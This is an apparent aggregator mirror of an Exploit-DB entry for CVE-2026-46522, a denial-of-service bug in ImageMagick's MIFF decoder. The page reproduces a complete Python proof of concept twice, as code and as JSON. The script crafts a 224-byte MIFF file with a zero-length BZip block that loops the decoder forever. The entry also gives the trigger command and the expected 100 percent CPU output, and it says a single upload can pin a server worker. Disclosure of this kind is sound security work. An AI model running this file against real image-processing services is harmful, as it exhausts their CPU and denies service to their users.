ImageMagick – Infinite Loop in the MIFF decoder can lead...

Description

Exploit Title: ImageMagick - Infinite Loop in the MIFF decoder can lead to CPU exhaustion Google Dork: N/A Date: 2026-05-13 Exploit Author: Jose Rivas bl4cksku11 & Zero Trust Offsec Vendor Homepage: https://imagemagick.org/ Software Link:...

Visit Original Source

Basic Information

ID EDB-ID:52595

Published May 29, 2026 at 00:00

Affected Product

Affected Versions # Exploit Title: ImageMagick - Infinite Loop in the MIFF decoder can lead to CPU exhaustion
# Google Dork: N/A
# Date: 2026-05-13
# Exploit Author: Jose Rivas (bl4cksku11) & Zero Trust Offsec
# Vendor Homepage: https://imagemagick.org/
# Software Link: https://imagemagick.org/download/
# Version: ImageMagick 7.x, verified on 7.1.2-3 system
# CVE : CVE-2026-46522
# GHSA: https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-7gg8-qqx7-92g5
"""
Description
-----------
coders/miff.c ReadMIFFImage BZip2 branch does not reject length=0 in the
per-block compressed length prefix. BZ2_bzDecompress with avail_in=0 returns
BZ_OK silently, and the IM loop only exits on BZ_STREAM_END or on codes that
are neither BZ_OK nor BZ_STREAM_END. The loop spins forever consuming CPU.

LZMA and Zip branches have the same code shape but their decompressor
libraries return BUF_ERROR on empty input, so they bail out.

Minimal PoC is 224 bytes. Single HTTP upload pegs a worker at 100 percent CPU
until killed by a request timeout or by the OS.

Usage
-----
python3 miff_bzip_dos.py [OUTPUT_PATH]

Default OUTPUT_PATH is /tmp/poc.miff. Then trigger:

/usr/bin/time -f 'wall=%es user=%Us cpu=%P exit=%x' \\
timeout 5 magick identify /tmp/poc.miff

Expected output:
Command exited with non-zero status 124
wall=5.00s user=5.00s cpu=100% exit=124

The process never finishes on its own. Timeout kills it.
"""

import sys

def craft_miff(path: str) -> None:
header = (
b"id=ImageMagick version=1.0\n"
b"class=DirectClass colors=0 alpha-trait=Undefined\n"
b"number-channels=3 number-meta-channels=0 channel-mask=0x0000000000000007\n"
b"columns=1 rows=1 depth=8\n"
b"colorspace=sRGB compression=BZip quality=75\n"
b"\x0c\n" # form feed terminator, then one byte consumed by ReadBlobByte
)
body = b"\x00\x00\x00\x00" # 4-byte MSB length=0, triggers the infinite loop
with open(path, "wb") as f:
f.write(header + body)
import os
print(f"[+] Wrote {path} ({os.path.getsize(path)} bytes)")
print(f"[+] Trigger with:")
print(f" /usr/bin/time -f 'wall=%es user=%Us cpu=%P exit=%x' \\")
print(f" timeout 5 magick identify {path}")

if __name__ == "__main__":
craft_miff(sys.argv[1] if len(sys.argv) > 1 else "/tmp/poc.miff")

{
    "lastseen": "2026-05-29T11:29:17",
    "description": "Exploit Title: ImageMagick - Infinite Loop in the MIFF decoder can lead to CPU exhaustion Google Dork: N/A Date: 2026-05-13 Exploit Author: Jose Rivas bl4cksku11 & Zero Trust Offsec Vendor Homepage: https://imagemagick.org/ Software Link:...",
    "published": "2026-05-29T00:00:00",
    "modified": "2026-05-29T00:00:00",
    "type": "exploitdb",
    "title": "ImageMagick - Infinite Loop in the MIFF decoder can lead to CPU exhaustion",
    "source": "",
    "references": "",
    "id": "EDB-ID:52595",
    "bulletinFamily": "exploit",
    "cwe": null,
    "cvelist": [
        "CVE-2026-46522"
    ],
    "sourceData": "# Exploit Title: ImageMagick - Infinite Loop in the MIFF decoder can lead to CPU exhaustion \r\n# Google Dork: N/A\r\n# Date: 2026-05-13\r\n# Exploit Author: Jose Rivas (bl4cksku11) & Zero Trust Offsec\r\n# Vendor Homepage: https://imagemagick.org/\r\n# Software Link: https://imagemagick.org/download/\r\n# Version: ImageMagick 7.x, verified on 7.1.2-3 system\r\n# CVE : CVE-2026-46522\r\n# GHSA: https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-7gg8-qqx7-92g5\r\n\"\"\"\r\nDescription\r\n-----------\r\ncoders/miff.c ReadMIFFImage BZip2 branch does not reject length=0 in the\r\nper-block compressed length prefix. BZ2_bzDecompress with avail_in=0 returns\r\nBZ_OK silently, and the IM loop only exits on BZ_STREAM_END or on codes that\r\nare neither BZ_OK nor BZ_STREAM_END. The loop spins forever consuming CPU.\r\n\r\nLZMA and Zip branches have the same code shape but their decompressor\r\nlibraries return BUF_ERROR on empty input, so they bail out.\r\n\r\nMinimal PoC is 224 bytes. Single HTTP upload pegs a worker at 100 percent CPU\r\nuntil killed by a request timeout or by the OS.\r\n\r\nUsage\r\n-----\r\n    python3 miff_bzip_dos.py [OUTPUT_PATH]\r\n\r\nDefault OUTPUT_PATH is /tmp/poc.miff. Then trigger:\r\n\r\n    /usr/bin/time -f 'wall=%es user=%Us cpu=%P exit=%x' \\\\\r\n      timeout 5 magick identify /tmp/poc.miff\r\n\r\nExpected output:\r\n    Command exited with non-zero status 124\r\n    wall=5.00s user=5.00s cpu=100% exit=124\r\n\r\nThe process never finishes on its own. Timeout kills it.\r\n\"\"\"\r\n\r\nimport sys\r\n\r\ndef craft_miff(path: str) -> None:\r\n    header = (\r\n        b\"id=ImageMagick version=1.0\\n\"\r\n        b\"class=DirectClass colors=0 alpha-trait=Undefined\\n\"\r\n        b\"number-channels=3 number-meta-channels=0 channel-mask=0x0000000000000007\\n\"\r\n        b\"columns=1 rows=1 depth=8\\n\"\r\n        b\"colorspace=sRGB compression=BZip quality=75\\n\"\r\n        b\"\\x0c\\n\"          # form feed terminator, then one byte consumed by ReadBlobByte\r\n    )\r\n    body = b\"\\x00\\x00\\x00\\x00\"   # 4-byte MSB length=0, triggers the infinite loop\r\n    with open(path, \"wb\") as f:\r\n        f.write(header + body)\r\n    import os\r\n    print(f\"[+] Wrote {path} ({os.path.getsize(path)} bytes)\")\r\n    print(f\"[+] Trigger with:\")\r\n    print(f\"    /usr/bin/time -f 'wall=%es user=%Us cpu=%P exit=%x' \\\\\")\r\n    print(f\"      timeout 5 magick identify {path}\")\r\n\r\nif __name__ == \"__main__\":\r\n    craft_miff(sys.argv[1] if len(sys.argv) > 1 else \"/tmp/poc.miff\")",
    "sourceHref": "https://www.exploit-db.com/raw/52595",
    "cvss": {
        "score": 0,
        "severity": "NONE",
        "vector": "NONE",
        "version": "NONE"
    },
    "cvss2": [],
    "cvss3": {
        "version": "",
        "vectorString": "",
        "baseScore": 0,
        "baseSeverity": "",
        "attackVector": "",
        "attackComplexity": "",
        "privilegesRequired": "",
        "userInteraction": "",
        "scope": "",
        "confidentialityImpact": "",
        "integrityImpact": "",
        "availabilityImpact": "",
        "cvssV3": {
            "version": "",
            "vectorString": "",
            "baseScore": 0,
            "baseSeverity": "",
            "attackVector": "",
            "attackComplexity": "",
            "privilegesRequired": "",
            "userInteraction": "",
            "scope": "",
            "confidentialityImpact": "",
            "integrityImpact": "",
            "availabilityImpact": ""
        }
    },
    "href": "https://www.exploit-db.com/exploits/52595",
    "category_name": "Exploit",
    "post_link": "",
    "product": "",
    "version": "",
    "vendor": "",
    "ai_description": "",
    "ai_severity": "",
    "ai_vendor": "",
    "ai_product": "",
    "ai_version": "",
    "ai_score": 0
}

ImageMagick – Infinite Loop in the MIFF decoder can lead to CPU exhaustion_EDB-ID:52595

Description

Basic Information

Affected Product

💭 Join the Security Discussion ❌ Cancel Reply